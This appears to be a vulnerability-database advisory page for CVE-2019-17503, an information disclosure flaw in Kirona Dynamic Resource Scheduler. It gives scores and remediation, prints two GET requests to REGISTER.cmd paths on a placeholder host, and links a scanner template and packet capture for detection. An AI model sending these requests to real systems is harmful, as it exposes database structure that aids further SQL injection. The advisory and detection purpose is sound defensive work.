🔙 목록으로 돌아가기

CVE-2019-17503: Kirona Dynamic Resource Scheduler - Information Disclosure

TitleKirona Dynamic Resource Scheduler - Information Disclosure
AuthorLogicalHunter
SeverityMedium
ImpactUnauthenticated attackers can access sensitive information including database version, table names, and column names through exposed SQL queries, facilitating further SQL injection or database attacks.
RemediationApply the latest patch or update provided by the vendor to fix the information disclosure vulnerability.
CVSS Score5.3
EPSS Score0.9022
CVE IDCVE-2019-17503
CWE IDCWE-425
Tags cve cve2019 exposure edb packetstorm kirona vkev vuln

🔍 Vulnerability Description

Kirona Dynamic Resource Scheduler is susceptible to information disclosure. An unauthenticated user can directly access /osm/REGISTER.cmd (aka /osm_tiles/REGISTER.cmd), which contains sensitive information with exposed SQL queries, such as database version, table name, and column name.

🌐 HTTP Request

GET /osm/REGISTER.cmd HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:1.9.7.20) Gecko/ Firefox/3.6.7
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
GET /osm_tiles/REGISTER.cmd HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/125.5.6 (KHTML, like Gecko) Safari/125.12
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2019/CVE-2019-17503.yaml

🦈 Packet Capture: ⬇️ Download cve-2019-17503.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A